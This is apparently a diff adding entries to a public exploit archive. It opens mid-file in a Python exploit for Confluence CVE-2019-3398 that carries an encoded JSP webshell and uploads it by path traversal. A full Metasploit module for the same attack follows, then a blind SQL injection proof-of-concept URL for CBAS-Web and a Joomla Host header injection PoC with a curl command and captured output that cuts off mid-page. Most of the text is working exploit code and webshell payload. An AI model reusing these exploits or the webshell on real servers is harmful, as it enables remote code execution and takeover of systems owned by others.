I+CjwvRk9STT4gCjxwcmU+CjwlIApcdTAwNjlcdTAwNjZcdTAwMjBcdTAwMjhcdTAwNzJcdTAwNjVc \
dTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNT \
BcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAw \
MjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAwMjlcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdT \
AwNkVcdTAwNzVcdTAwNkNcdTAwNkNcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBcdTAwMjBc \
dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMk \
VcdTAwNzBcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwMjJcdTAw \
NDNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAwM0FcdTAwMjBcdTAwMjJcdT \
AwMjBcdTAwMkJcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNzFcdTAwNzVcdTAwNjVcdTAwNzNcdTAwNzRc \
dTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAwNjFcdTAwNzJcdTAwNjFcdTAwNkRcdTAwNj \
VcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdTAwNjNcdTAwNkRcdTAwNjRcdTAwMjJcdTAw \
MjlcdTAwMjBcdTAwMkJcdTAwMjBcdTAwMjJcdTAwNUNcdTAwNkVcdTAwM0NcdTAwNDJcdTAwNTJcdT \
AwM0VcdTAwMjJcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBc \
dTAwMjBcdTAwMjBcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNjdcdTAwNU \
JcdTAwNURcdTAwMjBcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAw \
MjBcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNjVcdTAwNzdcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdT \
AwNjlcdTAwNkVcdTAwNjdcdTAwNUJcdTAwNURcdTAwMjBcdTAwN0JcdTAwMjJcdTAwMkZcdTAwNjJc \
dTAwNjlcdTAwNkVcdTAwMkZcdTAwNzNcdTAwNjhcdTAwMjJcdTAwMkNcdTAwMjBcdTAwMjJcdTAwMk \
RcdTAwNjNcdTAwMjJcdTAwMkNcdTAwMjBcdTAwNzJcdTAwNjVcdTAwNzFcdTAwNzVcdTAwNjVcdTAw \
NzNcdTAwNzRcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTBcdTAwNjFcdTAwNzJcdTAwNjFcdT \
AwNkRcdTAwNjVcdTAwNzRcdTAwNjVcdTAwNzJcdTAwMjhcdTAwMjJcdTAwNjNcdTAwNkRcdTAwNjRc \
dTAwMjJcdTAwMjlcdTAwN0RcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \
BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNTBcdTAwNzJcdTAwNkZcdTAwNjNcdTAwNjVcdTAwNzNcdTAw \
NzNcdTAwMjBcdTAwNzBcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNTJcdTAwNzVcdTAwNkVcdTAwNzRcdT \
AwNjlcdTAwNkRcdTAwNjVcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNTJcdTAwNzVcdTAwNkVc \
dTAwNzRcdTAwNjlcdTAwNkRcdTAwNjVcdTAwMjhcdTAwMjlcdTAwMkVcdTAwNjVcdTAwNzhcdTAwNj \
VcdTAwNjNcdTAwMjhcdTAwNjNcdTAwNkZcdTAwNkRcdTAwNkRcdTAwNjFcdTAwNkVcdTAwNjRcdTAw \
MjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdT \
AwMjBcdTAwNEZcdTAwNzVcdTAwNzRcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJc \
dTAwNjVcdTAwNjFcdTAwNkRcdTAwMjBcdTAwNkZcdTAwNzNcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNz \
BcdTAwMkVcdTAwNjdcdTAwNjVcdTAwNzRcdTAwNEZcdTAwNzVcdTAwNzRcdTAwNzBcdTAwNzVcdTAw \
NzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwMjlcdTAwM0JcdT \
AwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNDlc \
dTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNk \
RcdTAwMjBcdTAwNjlcdTAwNkVcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNzBcdTAwMkVcdTAwNjdcdTAw \
NjVcdTAwNzRcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdT \
AwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBc \
dTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwNDRcdTAwNjFcdTAwNzRcdTAwNjFcdTAwND \
lcdTAwNkVcdTAwNzBcdTAwNzVcdTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAw \
NkRcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNjVcdT \
AwNzdcdTAwMjBcdTAwNDRcdTAwNjFcdTAwNzRcdTAwNjFcdTAwNDlcdTAwNkVcdTAwNzBcdTAwNzVc \
dTAwNzRcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNkRcdTAwMjhcdTAwNjlcdTAwNk \
VcdTAwMjlcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \
MjBcdTAwMjBcdTAwNTNcdTAwNzRcdTAwNzJcdTAwNjlcdTAwNkVcdTAwNjdcdTAwMjBcdTAwNjRcdT \
AwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwMkVc \
dTAwNzJcdTAwNjVcdTAwNjFcdTAwNjRcdTAwNENcdTAwNjlcdTAwNkVcdTAwNjVcdTAwMjhcdTAwMj \
lcdTAwM0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \
MjBcdTAwNzdcdTAwNjhcdTAwNjlcdTAwNkNcdTAwNjVcdTAwMjBcdTAwMjhcdTAwMjBcdTAwNjRcdT \
AwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwMjFcdTAwM0RcdTAwMjBcdTAwNkVcdTAwNzVcdTAwNkNc \
dTAwNkNcdTAwMjBcdTAwMjlcdTAwMjBcdTAwN0JcdTAwMEFcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMj \
BcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAw \
MjBcdTAwMjBcdTAwMjBcdTAwNkZcdTAwNzVcdTAwNzRcdTAwMkVcdTAwNzBcdTAwNzJcdTAwNjlcdT \
AwNkVcdTAwNzRcdTAwNkNcdTAwNkVcdTAwMjhcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjlc \
dTAwM0JcdTAwMjBcdTAwNjRcdTAwNjlcdTAwNzNcdTAwNzJcdTAwMjBcdTAwM0RcdTAwMjBcdTAwNj \
RcdTAwNjlcdTAwNzNcdTAwMkVcdTAwNzJcdTAwNjVcdTAwNjFcdTAwNjRcdTAwNENcdTAwNjlcdTAw \
NkVcdTAwNjVcdTAwMjhcdTAwMjlcdTAwM0JcdTAwMjBcdTAwN0RcdTAwMEFcdTAwMjBcdTAwMjBcdT \
AwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwMjBcdTAwN0QKJT4KPC9wcmU+CjwvQk9EWT48 \
L0hUTUw+'
session = requests.session()
#proxies = {
# 'http': 'http://127.0.0.1:8080',
# 'https': 'https://127.0.0.1:8080'
#}
def do_authenticate():
global ATLTOKEN
auth_form_data = {
'os_username': USERNAME,
'os_password': PASSWORD,
'login': 'Log+in',
'os_destination': ''
}
r = session.post(LOGINURL, data=auth_form_data, allow_redirects=True, verify=False)#, proxies=proxies)
if r.text.find('re-enter your login') != -1:
print 'Authentication failed'
return 0
elif r.text.find('Sorry, your username and/or password are incorrect') != -1:
print 'Authentication failed'
return 0
elif r.text.find('Unauthorized') != -1:
print 'Unauthorized'
return 0
else:
print 'Authentication successful'
soup = BeautifulSoup(r.text, 'html.parser')
ATLTOKEN = soup.find('meta', {'id': 'atlassian-token'})['content']
print 'Atlassian token %s' % (ATLTOKEN)
return 1
def do_upload(_pageid):
if OS == 'Windows':
upload_form_data = SHELLCODE_WINDOWS
upload_req_params = {
'pageId': _pageid,
'filename': '../../../../../../../../../../' + ROOTFOLDER + 'assist.jsp',
'size': '3474',
'mimeType': 'text/plain',
'spaceKey': 'isis',
'atl_token': ATLTOKEN,
'name': 'assist'
}
elif OS == 'Linux':
upload_form_data = SHELLCODE_LINUX
upload_req_params = {
'pageId': _pageid,
'filename': '../../../../../../../../../../' + ROOTFOLDER + 'assist.jsp',
'size': '3516',
'mimeType': 'text/plain',
'spaceKey': 'isis',
'atl_token': ATLTOKEN,
'name': 'assist'
}
print 'Uploading webshell'
r = session.post(UPLOADURL, params=upload_req_params, data=base64.decodestring(upload_form_data), allow_redirects=True, verify=False)#, proxies=proxies)
if r.status_code == 200 and r.text.find('actionErrors') == -1:
print 'Webshell uploaded'
return 1
else:
print 'Error while uploading webshell'
return 0
def do_downloadall(_pageid):
downloadall_req_params = {
'pageId': _pageid
}
print 'Moving webshell to the root directory of the web server'
r = session.get(DOWNLOADALLURL, params=downloadall_req_params, allow_redirects=True, verify=False)#, proxies=proxies)
r = session.get(WEBSHELLURL, allow_redirects=True, verify=False)#, proxies=proxies)
if r.status_code == 200:
print 'Webshell found'
print 'Visit %s' % WEBSHELLURL
return 1
else:
print 'Webshell not found'
return 0
def do_getspaces():
print 'Getting spaces'
r = session.get(VIEWSPACESURL, allow_redirects=True, verify=False)#, proxies=proxies)
spacelist = re.findall(r'\"key\":\"(\w+)\"', r.text)
return spacelist
def do_createspace():
print 'Creating space'
upload_form_data = json.dumps({
"key": "TST1",
"name": "Example space",
"description": {
"plain": {
"value": "This is an example space",
"representation": "plain"
}
},
"metadata": {}
})
headers = {
'Content-Type': 'application/json'
}
r = session.post(VIEWSPACESURL, data=upload_form_data, headers=headers, allow_redirects=True, verify=False)#, proxies=proxies)
matched = re.match(".*\"key\":\"(\w+)\".*", r.text)
if matched:
print 'Space created'
return matched.group(1)
else:
print 'Space not created'
return 0
def do_createpage(space):
global PAGEID
print 'Trying %s space' % (space)
r = session.get(CREATEPAGEURL+space, allow_redirects=True, verify=False)#, proxies=proxies)
if r.status_code == 200 and r.text.find('ajs-draft-id') != -1:
soup = BeautifulSoup(r.text, 'html.parser')
pageid = soup.find('meta', {'name': 'ajs-draft-id'})['content']
pageid_pattern = re.compile("^(\d+)$")
if pageid_pattern.match(pageid):
PAGEID = pageid
print 'Page ID created %s' % (pageid)
return 1
else:
print 'Unexpected Page ID format'
return 0
else:
print 'Page ID not created'
return 0
def main():
if do_authenticate() != 1:
exit()
if PAGEID != '':
if PAGEID == '0':
spaces = do_getspaces()
for sp in spaces:
if do_createpage(sp) == 1:
if do_upload(PAGEID) != 1:
continue
if do_downloadall(PAGEID) != 1:
continue
else:
exit()
new_sp = do_createspace()
if new_sp != 0:
if do_createpage(new_sp) == 1:
if do_upload(PAGEID) != 1:
exit()
if do_downloadall(PAGEID) != 1:
exit()
exit()
else:
exit()
else:
exit()
if do_upload(PAGEID) != 1:
exit()
if do_downloadall(PAGEID) != 1:
exit()
else:
ID = PAGEID_RANGE_START
while ID <= PAGEID_RANGE_END:
print 'Trying Page Id %d' % (ID)
if do_upload(ID) == 1:
if do_downloadall(ID) == 1:
break
ID += 1
if __name__ == "__main__":
main()

398
exploits/jsp/webapps/47635.rb Executable file
View file

@ -0,0 +1,398 @@
# Exploit Title: Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: max7253
# Vendor Homepage: https://www.atlassian.com
# Software Link: https://www.atlassian.com/software/confluence/download-archives
# Version: 6.15.1
# Tested on: Microsoft Windows 7 Enterprise, 6.1.7601 Service Pack 1 Build 7601, Linux 5.0.0-23-generic #24~18.04.1-Ubuntu
# CVE : N/A
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Confluence Arbitrary File Write via Path Traversal (CVE-2019-3398)",
'Description' => %q{
To use this exploit you should specify the following variables:
USERNAME and PASSWORD - the login/password to log into the web interface of the Atlassian Confluence server.
ROOTFOLDER - the root directory of the web server. If the root directory is located in C:\confluence\pages\, set this variable to ROOTFOLDER = 'confluence/pages/'.
Typical ROOTFOLDER locations are:
Windows: Program Files/Atlassian/Confluence/confluence/pages/
Linux: opt/atlassian/confluence/confluence/pages/
Note that the root directory of the web server and the temporary directory of the Atlassian Confluence server on Windows must be on the same drive (C:\ in the example above).
PAGEID - the pageId URL parameter you see in the browser address bar when you vist the Atlassian Confluence page where you have rights to upload files.
For example, https://server.net/pages/viewpageattachments.action?pageId=111111111&metadataLink=true.
If PAGEID is set to 0, the script will try to create a new Page ID. If it fails, it will try to create a new space and create a Page ID there.
If PAGEID is not specified, the script will walk though the PAGEID_RANGE_START..PAGEID_RANGE_END range.
The script gets authenticated to the Atlassian Confluence server, retrieves the ATLASSIAN TOKEN from the server response, uploads the shellcode, then imitates the 'Download all' action to place the shellcode to the root directory of the web server.
Tested on Atlassian v6.15.1. on Linux and Windows.
Note that on Linux Confluence runs under the 'confluence' account which may not have rights to save files in the root directory of the web server. In this case the exploit will fail. Also, to create a new space and get the list of existing spaces the script makes use of Confluence REST API, which is available starting from Confluence Server 5.5.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Maxim Guslyaev' # Metasploit module
],
'References' =>
[
[ 'CVE', '2019-3398' ],
[ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-04-17-968660855.html' ],
[ 'URL', 'https://devcentral.f5.com/s/articles/confluence-arbitrary-file-write-via-path-traversal-cve-2019-3398-34181'],
[ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-3398']
],
'Privileged' => false,
'Platform' => %w{ linux win },
'Targets' =>
[
[ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_JAVA }],
[ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_JAVA }]
],
'DefaultOptions' =>
{
'RPORT' => 8090,
'SSL' => false
},
'DisclosureDate' => 'Nov 9 2019',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('USERNAME', [true, 'The login to log into the web interface of the Atlassian Confluence server', 'test']),
OptString.new('PASSWORD', [true, 'The password to log into the web interface of the Atlassian Confluence server', 'test']),
OptString.new('ROOTFOLDER', [true, 'The root folder of the Atlassian Confluence server', 'Program Files/Atlassian/Confluence/confluence/pages/']),
#OptString.new('ROOTFOLDER', [true, 'The root folder of the Atlassian Confluence server', 'opt/atlassian/confluence/confluence/pages/']),
OptString.new('FILENAME', [true, 'The JSP shellcode file name', 'covfefe.jsp']),
OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),
OptString.new('NEWSPACE', [false, 'A new space to be created', 'TESTSPACE432545645']),
OptInt.new('PAGEID', [false, 'A Page ID to be used to upload shellcode', 0]),
OptInt.new('PAGEID_RANGE_START', [false, 'The first Page ID to be used to enumerate a writable Page ID (used when PAGEID is not specified)', '1']),
OptInt.new('PAGEID_RANGE_END', [false, 'The last Page ID to be used to enumerate a writable Page ID (used when PAGEID is not specified)', '999999999']),
], self.class)
end
def do_authenticate
print_status("Sending POST request to the web application (authentication)...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, '/dologin.action'),
'method' => 'POST',
'vars_post' => {
'os_username' => datastore['USERNAME'],
'os_password' => datastore['PASSWORD'],
'os_destination' => '',
'login' => 'Log+In'
}
})
if res.nil?
print_status("Unable to access the web application!")
return 0
end
@sessid = get_sid(res)
if @sessid.nil?
print_status("Unable to retrieve session ID!")
return 0
end
print_status("Getting Session ID from the web application... #{@sessid}")
if res && res.redirect?
location = res.redirection
if location.nil?
print_status("Unable to access the web application when redirected!")
return 0
end
res = send_request_cgi!({
'uri' => normalize_uri(target_uri.path.to_s, location.to_s),
'method' => 'GET',
'headers' => {
'Cookie' => @sessid
}
}, redirect_depth = 5)
end
if res && res.code == 200
if res.body =~ /re-enter\syour\slogin/ || res.body =~ /Sorry,\syour\susername\sand\/or\spassword\sare\sincorrect/ || res.body =~ /Unauthorized/
print_status("Authentication failed...")
return 0
end
@xsrf_token = res.get_html_document.at('meta[@id="atlassian-token"]')['content']
if @xsrf_token.nil? or @xsrf_token.blank?
print_status("Failed to retrieve XSRF token...")
return 0
else
print_status("Retrieving XSRF token... #{@xsrf_token}")
return 1
end
else
print_status("Unexpected response from the web application...")
return 0
end
end
def do_upload(_pageid)
print_status("Sending POST request to the web application (shellcode upload)...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, '/plugins/drag-and-drop/upload.action'),
'method' => 'POST',
'vars_get' => {
'pageId' => _pageid,
'filename' => '../../../../../../../../../../' + datastore['ROOTFOLDER'] + datastore['FILENAME'],
'size' => payload.encoded.length,
'mimeType' => 'text/plain',
'spaceKey' => 'isis',
'atl_token' => @xsrf_token,
'name' => datastore['FILENAME']
},
'data' => payload.encoded,
'headers' => {
'Connection' => 'close',
'Accept' => '*/*',
'Accept-Encoding' => 'identity',
'Cookie' => @sessid,
'Content-Length' => payload.encoded.length,
'Content-Type' => 'text/plain'
}
})
if res && res.code == 200 && res.body.scan(/actionErrors/).blank?
print_status("Shellcode uploaded...")
return 1
else
return 0
end
end
def do_downloadall(_pageid)
for downloadall_iter in 1..10
print_status("Sending GET request to the web application (downloadall)...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, '/pages/downloadallattachments.action'),
'method' => 'GET',
'vars_get' => {
'pageId' => _pageid
},
'headers' => {
'Cookie' => @sessid
}
})
print_status("Sending GET request to the web application (shellcode invokation)...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, '/pages/' + datastore['FILENAME']),
'method' => 'GET',
'headers' => {
'Cookie' => @sessid
}
}, timeout = 10)
if res && res.code == 200
print_status("Shellcode found...")
return 1
else
if downloadall_iter == 10
print_status("Shellcode not found...")
return 0
end
end
end
end
def do_getspaces
print_status("Sending GET request to the web application (getting available spaces)...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, '/rest/api/space'),
'method' => 'GET',
'headers' => {
'User-Agent' => 'python-requests/2.20.0',
'Cookie' => @sessid,
'Accept' => '*/*',
'Accept-Encoding' => 'identity',
'Content-Type' => 'application/json'
}
})
if res && res.code == 200 && res.body =~ /results/
space_list = res.body.scan(/\"key\":\"(\w+)\"/).flatten
else
space_list = Array([])
end
return space_list
end
def do_createspace
print_status("Sending POST request to the web application (creating a space)...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, '/rest/api/space'),
'method' => 'POST',
'data' => {
"key": datastore['NEWSPACE'],
"name": "Example space",
"description": {
"plain": {
"value": "This is an example space",
"representation": "plain"
}
},
"metadata": {}
}.to_json,
'headers' => {
'User-Agent' => 'python-requests/2.20.0',
'Cookie' => @sessid,
'Accept-Encoding' => 'identity',
'Content-Type' => 'application/json'
}
})
if res && res.code == 200 && res.body =~ /\"key\":\"\w+\"/
print_status("Space created...")
return res.body.scan(/\"key\":\"(\w+)\"/).flatten[0]
else
print_status("Space not created...")
return 0
end
end
def do_createpage(_space)
print_status("Sending GET request to the web application (creating Page ID), space #{_space}...")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, '/pages/createpage.action?spaceKey='+_space),
'method' => 'GET',
'headers' => {
'Cookie' => @sessid
}
})
if res && res.code == 200 && res.body =~ /ajs-draft-id/
pageid = res.get_html_document.at('meta[@name="ajs-draft-id"]')['content']
pageid_parsed = /(\d+)/.match(pageid)
if pageid_parsed.nil?
print_status("Unexpected Page ID format...")
return 0
else
print_status("Page ID created... #{pageid}")
datastore['PAGEID'] = pageid
return 1
end
else
return 0
end
end
def get_sid(res)
if res.nil?
return ''
end
res.get_cookies.scan(/(JSESSIONID=\w+);*/).flatten[0] || ''
end
def exploit
print_status("Getting authenticated to the web application...")
if do_authenticate != 1
fail_with(Failure::Unknown, 'Initial access or authentication error!')
end
unless datastore['PAGEID'].blank?
if datastore['PAGEID'] == 0
print_status("Creating Page ID...")
spaces = do_getspaces
for sp in spaces
if do_createpage(sp) == 1
print_status("Uploading shellcode...")
if do_upload(datastore['PAGEID']) != 1
print_status("Failed to upload shellcode...")
next
end
print_status("Invoking shellcode...")
if do_downloadall(datastore['PAGEID']) != 1
print_status("Failed to invoke shellcode...")
next
else
return
end
end
end
print_status("Trying to create a new space...")
new_sp = do_createspace
if new_sp != 0
if do_createpage(new_sp) == 1
print_status("Uploading shellcode...")
if do_upload(datastore['PAGEID']) != 1
fail_with(Failure::Unknown, 'Error while uploading shellcode!')
end
print_status("Invoking shellcode...")
if do_downloadall(datastore['PAGEID']) != 1
fail_with(Failure::Unknown, 'Error while invoking shellcode!')
end
return
else
fail_with(Failure::Unknown, 'Error while creating page in the newly created space!')
end
else
fail_with(Failure::Unknown, 'Error while creating space!')
end
end
print_status("Uploading shellcode...")
if do_upload(datastore['PAGEID']) != 1
fail_with(Failure::Unknown, 'Error while uploading shellcode!')
end
print_status("Invoking shellcode...")
if do_downloadall(datastore['PAGEID']) != 1
fail_with(Failure::Unknown, 'Error while invoking shellcode!')
end
else
for id in datastore['PAGEID_RANGE_START']..datastore['PAGEID_RANGE_END']
print_status("Trying Page Id #{id}")
print_status("Uploading shellcode...")
if do_upload(id) == 1
print_status("Invoking shellcode...")
if do_downloadall(id) == 1
break
end
end
end
end
end
def check
res = send_request_cgi!({
'uri' => normalize_uri(target_uri.path.to_s, '/login.action?anon=1&logout=1'),
'method' => 'GET',
}, redirect_depth = 5)
if res && res.body =~ /Powered\sby/
ver = res.body.scan(/^.*Powered\sby\s.*(\d{1,}\.\d{1,}\.\d{1,}).*$/).flatten[0]
print_status("The version of the web application is #{ver}")
ver_parsed = /(\d+)\.(\d+)\.(\d+)/.match(ver.to_s)
if ver_parsed.nil?
print_status("The version of the web application couldn't be parsed")
return Exploit::CheckCode::Detected
end
ver_oct1 = ver_parsed[1].to_i
ver_oct2 = ver_parsed[2].to_i
ver_oct3 = ver_parsed[3].to_i
if ver_oct1.between?(2, 6) && ver_oct2.between?(0, 6) && ver_oct3.between?(0, 12) || ver_oct1.between?(6, 6) && ver_oct2.between?(7, 12) && ver_oct3.between?(0, 3) || ver_oct1.between?(6, 6) && ver_oct2.between?(13, 13) && ver_oct3.between?(0, 3) || ver_oct1.between?(6, 6) && ver_oct2.between?(14, 14) && ver_oct3.between?(0, 2) || ver_oct1.between?(6, 6) && ver_oct2.between?(15, 15) && ver_oct3.between?(0, 1)
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
else
return Exploit::CheckCode::Unknown
end
end
end

16
exploits/php/webapps/47631.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : N/A
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Computrols CBAS-Web Authenticated Boolean-based Blind SQL Injection
# PoC (id param):
http://192.168.1.250/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510=2510

237
exploits/php/webapps/47632.txt Normal file
View file

@ -0,0 +1,237 @@
# Exploit Title: Joomla 3.9.13 - 'Host' Header Injection
# Author: Pablo Santiago
# Date: 2019-11-12
# Vendor Homepage: https://www.joomla.org/
# Source: https://downloads.joomla.org/cms/joomla3/3-9-13/Joomla_3-9-13-Stable-Full_Package.zip?format=zip
# Version: 3.9.13
# CVE : N/A
# Tested on: Windows 10
#PoC
curl http://localhost/joomla/ -H "Host: exploit-db.com"
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta charset="utf-8" />
<base href="http://exploit-db.com/joomla/" />
<meta name="description" content="javacript:alert(document.cookie)" />
<meta name="generator" content="Joomla! - Open Source Content
Management" />
<title>Home</title>
<link href="/joomla/index.php?format=feed&type=rss"
rel="alternate" type="application/rss+xml" title="RSS 2.0" />
<link href="/joomla/index.php?format=feed&type=atom"
rel="alternate" type="application/atom+xml" title="Atom 1.0" />
<link href="/joomla/templates/protostar/favicon.ico"
rel="shortcut icon" type="image/vnd.microsoft.icon" />
<link href="/joomla/templates/protostar/css/template.css?190197408a83fd286a9c42640a0f2f22"
rel="stylesheet" />
<link href="https://fonts.googleapis.com/css?family=Open+Sans"
rel="stylesheet" />
<style>
h1, h2, h3, h4, h5, h6, .site-title {
font-family: 'Open Sans', sans-serif;
}
</style>
<script type="application/json" class="joomla-script-options
new">{"csrf.token":"d460ac322fbbb6ae67cc78034182d9e1","system.paths":{"root":"\/joomla","base":"\/joomla"},"system.keepalive":{"interval":840000,"uri":"\/joomla\/index.php\/component\/ajax\/?format=json"}}</script>
<script
src="/joomla/media/jui/js/jquery.min.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/jui/js/jquery-noconflict.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/jui/js/jquery-migrate.min.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/system/js/caption.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/jui/js/bootstrap.min.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/templates/protostar/js/template.js?190197408a83fd286a9c42640a0f2f22"></script>
<!--[if lt IE 9]><script
src="/joomla/media/jui/js/html5.js?190197408a83fd286a9c42640a0f2f22"></script><![endif]-->
<script
src="/joomla/media/system/js/core.js?190197408a83fd286a9c42640a0f2f22"></script>
<!--[if lt IE 9]><script
src="/joomla/media/system/js/polyfill.event.js?190197408a83fd286a9c42640a0f2f22"></script><![endif]-->
<script
src="/joomla/media/system/js/keepalive.js?190197408a83fd286a9c42640a0f2f22"></script>
<script>
jQuery(window).on('load', function() {
new JCaption('img.caption');
jQuery(function($){ initTooltips(); $("body").on("subform-row-add",
initTooltips); function initTooltips (event, container) { container =
container || document;$(container).find(".hasTooltip").tooltip({"html":
true,"container": "body"});} });
</script>
</head>
<body class="site com_content view-featured no-layout no-task itemid-101">
<!-- Body -->
<div class="body" id="top">
<div class="container">
<!-- Header -->
<header class="header" role="banner">
<div class="header-inner clearfix">
<a class="brand pull-left"
href="/joomla/">
<span
class="site-title"
title="javacript:alert(document.cookie)">javacript:alert(document.cookie)</span>
</a>
<div class="header-search pull-right">
</div>
</div>
</header>
<div class="row-fluid">
<main
id="content" role="main" class="span9">
<!-- Begin Content -->
<div id="system-message-container">
</div>
<div class="blog-featured"
itemscope itemtype="https://schema.org/Blog">
<div class="page-header">
<h1>
Home </h1>
</div>
</div>
<div class="clearfix"></div>
<div aria-label="breadcrumbs"
role="navigation">
<ul itemscope itemtype="https://schema.org/BreadcrumbList"
class="breadcrumb">
<li>
You are here: &#160;
</li>
<li
itemprop="itemListElement" itemscope
itemtype="https://schema.org/ListItem" class="active">
<span itemprop="name">
Home
</span>
<meta itemprop="position" content="1">
</li>
</ul>
</div>
<!-- End Content -->
</main>
<div id="aside" class="span3">
<!-- Begin Right Sidebar -->
<div class="well
_menu"><h3 class="page-header">Main Menu</h3><ul class="nav menu
mod-list">
<li class="item-101 default current active"><a
href="/joomla/index.php" >Home</a></li></ul>
</div><div class="well "><h3 class="page-header">Login Form</h3><form
action="/joomla/index.php" method="post" id="login-form"
class="form-inline">
<div class="userdata">
<div id="form-login-username" class="control-group">
<div class="controls">
<div class="input-prepend">
<span class="add-on">
<span
class="icon-user hasTooltip" title="Username"></span>
<label
